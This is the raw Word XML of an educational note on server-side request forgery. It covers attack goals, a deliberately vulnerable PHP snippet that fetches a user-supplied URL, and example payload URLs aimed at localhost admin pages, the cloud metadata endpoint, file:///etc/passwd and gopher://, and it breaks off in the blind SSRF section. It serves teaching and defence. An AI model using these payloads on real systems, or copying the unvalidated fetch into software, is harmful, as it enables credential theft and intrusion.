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73BF3" w14:textId="77777777" w:rsidR="00C8732E" w:rsidRPr="00C8732E" w:rsidRDefault="00C8732E" w:rsidP="00864C87">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00C8732E">
        <w:t>Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D21D5BA" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:r w:rsidRPr="00864C87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00864C87">
        <w:t xml:space="preserve"> occurs when an attacker is able to </w:t>
      </w:r>
      <w:r w:rsidRPr="00864C87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>make the server perform HTTP requests to internal or external systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00864C87">
        <w:t xml:space="preserve"> by supplying or manipulating a URL input field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46113349" w14:textId="77777777" w:rsidR="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:r w:rsidRPr="00864C87">
        <w:t xml:space="preserve">The server acts as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00864C87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00864C87">
        <w:t>, making requests on behalf of the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CB7C9B" w14:textId="062B7FF7" w:rsidR="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:t>SSRF Attack Goals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206"/>
      </w:tblGrid>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="3BB696C1" w14:textId="77777777" w:rsidTr="00864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2499A" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F1E6287" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="4FA854B9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4F6A" w14:textId="6B540D1C" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Internal Network Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="476D8587" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Access services like 127.0.0.1, 10.0.0.0/8, 169.254.169.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="12120A95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1E65" w14:textId="001079A6" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Data Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CE5AC5B" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Send internal data to attacker-controlled server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="212D21D7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CC2C8" w14:textId="077A22C2" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Authentication Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25394587" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Exploit internal-only APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="60D49E10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7E7C1" w14:textId="23697CC0" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Cloud Metadata Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2202CF3A" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>AWS, GCP, Azure secrets via metadata endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="680CD2F9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BC47" w14:textId="20E385E7" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>RCE (via chained services)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1803E249" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Exploit SSRF → Redis, Jenkins, webhooks, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D3E8E76" w14:textId="77777777" w:rsidR="00C8732E" w:rsidRDefault="00C8732E" w:rsidP="00864C87">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00C8732E">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A93B26F" w14:textId="58205500" w:rsidR="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:r w:rsidRPr="00864C87">
        <w:t>Vulnerable Code (PHP):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00864C87">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$image = $_GET['url'];</w:t>
      </w:r>
      <w:r w:rsidRPr="00864C87">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00864C87">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$content = file_get_contents($image);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00864C87">
        <w:t>Attacker Input:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00864C87">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>http://localhost/admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00864C87">
        <w:t>Server fetches internal-only endpoint on behalf of attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7495FB5E" w14:textId="0ADA9854" w:rsidR="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:t>Targets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4001"/>
      </w:tblGrid>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="6E50D3B8" w14:textId="77777777" w:rsidTr="00864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F77A2" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="667D41C3" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="2DD02B67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19AE" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>http://localhost:80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3000E7FA" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Local services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="367571E7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D022" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>http://127.0.0.1:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60C6674A" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Admin panels</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="2BD84A3C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7399" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>http://169.254.169.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A2295C4" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>AWS Metadata (IMDS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="3AEA7B08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A4F5" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>http://10.0.0.1:9000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E591794" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Internal API, Redis, Jenkins</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="44FFCC9F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BBE5" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>file:///etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28FB1FCD" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>File disclosure (if supported)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="202E8EA5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BEBD" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>gopher://</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21F71D5F" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Exploit Redis/MySQL through protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E2D3D92" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87"/>
    <w:p w14:paraId="0126EC61" w14:textId="42EBB4B6" w:rsidR="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:lastRenderedPageBreak/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5077"/>
      </w:tblGrid>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="3EC53E1D" w14:textId="77777777" w:rsidTr="00864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2871A" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6855CDCE" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="4FE95DA3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B60D" w14:textId="1DF94E64" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t xml:space="preserve"> Bypass Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2710F08F" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Access internal services not exposed externally</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="7FC70BC7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1F30" w14:textId="004122F5" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t xml:space="preserve"> Cloud Credential Theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D4B60A2" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Read AWS metadata → get IAM tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="01E52ED5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C4E9" w14:textId="5DE6AF33" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t xml:space="preserve"> Data Leak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E5DDC9C" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Dump files, services, logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="35CD31AB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252E8" w14:textId="75DC1915" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t xml:space="preserve"> Service Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B736A99" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Map internal architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="4310BA6F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4EE8" w14:textId="17BB35E4" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t xml:space="preserve"> Remote Code Execution (chained)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="799ACF54" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>SSRF + Redis, gopher, webhook abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864C87" w:rsidRPr="00864C87" w14:paraId="73376CDE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D03F8" w14:textId="040F17AA" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t xml:space="preserve"> Pivot Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B1E4485" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00864C87">
              <w:t>Use server as a proxy for scanning other systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20F48645" w14:textId="77777777" w:rsidR="00864C87" w:rsidRDefault="00864C87" w:rsidP="00C8732E"/>
    <w:p w14:paraId="60456D35" w14:textId="520B9233" w:rsidR="00C8732E" w:rsidRDefault="00C8732E" w:rsidP="00C8732E">
      <w:r w:rsidRPr="00C8732E">
        <w:t>An attacker can manipulate the server into making requests to internal or unauthorized resources, potentially exposing sensitive data or accessing internal services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EF6FBD" w14:textId="6611C0CA" w:rsidR="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:t>Types of SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6557356E" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00B6290F" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6290F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Basic SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6290F">
        <w:t>: Directly manipulating the URL in the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA9ADA7" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00B6290F" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6290F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blind SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6290F">
        <w:t>: Response is not visible to the attacker, but impact can still be inferred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5177C0B3" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00B6290F" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6290F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chained SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00B6290F">
        <w:t>: SSRF used to pivot into internal systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C22156" w14:textId="77777777" w:rsidR="00864C87" w:rsidRDefault="00864C87" w:rsidP="00453B8B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Basic SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4785A134" w14:textId="6D9C11FE" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C8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64C87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Attacker inputs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00864C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  <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00864C87">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:kern w:val="2"/>
            <w:highlight w:val="yellow"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:t>http://127.0.0.1/admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00864C87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00864C87">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>App fetches internal resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223C14F6" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00453B8B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00864C87">
        <w:t>2. Blind SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FCEB9E" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:r w:rsidRPr="00864C87">
        <w:t>No direct response shown, but:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E80CD4" w14:textId="77777777" w:rsidR="00864C87" w:rsidRPr="00864C87" w:rsidRDefault="00864C87" w:rsidP="00864C87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
